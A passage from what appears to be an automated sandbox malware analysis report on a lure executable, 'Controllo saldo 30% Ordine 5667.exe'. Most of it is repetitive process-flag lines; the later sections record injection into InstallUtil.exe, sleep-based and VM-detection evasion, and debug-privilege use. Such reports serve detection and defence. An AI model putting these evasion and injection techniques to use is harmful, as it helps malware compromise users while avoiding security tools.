                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe TID: 6896Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe TID: 6448Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 7056Thread sleep count: 34 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6332Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6384Thread sleep count: 4815 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6384Thread sleep count: 3802 > 30Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4815Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 3802Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: InstallUtil.exe, 0000000B.00000002.698836717.00000000060F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000003.556467264.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Controllo saldo 30% Ordine 5667.exe, 00000000.00000003.554735633.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.697971479.0000000003460000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.697735781.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.699889310.000000000448D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GSh58ZQeMu
                  Source: Vajejvz.exe, 0000000E.00000002.697735781.0000000003F60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 3DcVMCIbwf
                  Source: Vajejvz.exe, 0000000E.00000002.703119704.0000000006FA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}VJsC
                  Source: Controllo saldo 30% Ordine 5667.exe, 00000000.00000003.554735633.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000D.00000002.697971479.0000000003460000.00000004.00000800.00020000.00000000.sdmp, Vajejvz.exe, 0000000E.00000002.697735781.0000000003F60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qLXRDM0hGFSLiiWGy0h
                  Source: Vajejvz.exe, 0000000D.00000002.694302192.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_063E3CD8 LdrInitializeThunk,11_2_063E3CD8
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 436000Jump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 438000Jump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: A02008Jump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 5Jump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Aabvlngef\Vajejvz.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 5Jump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Controllo saldo 30% Ordine 5667.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
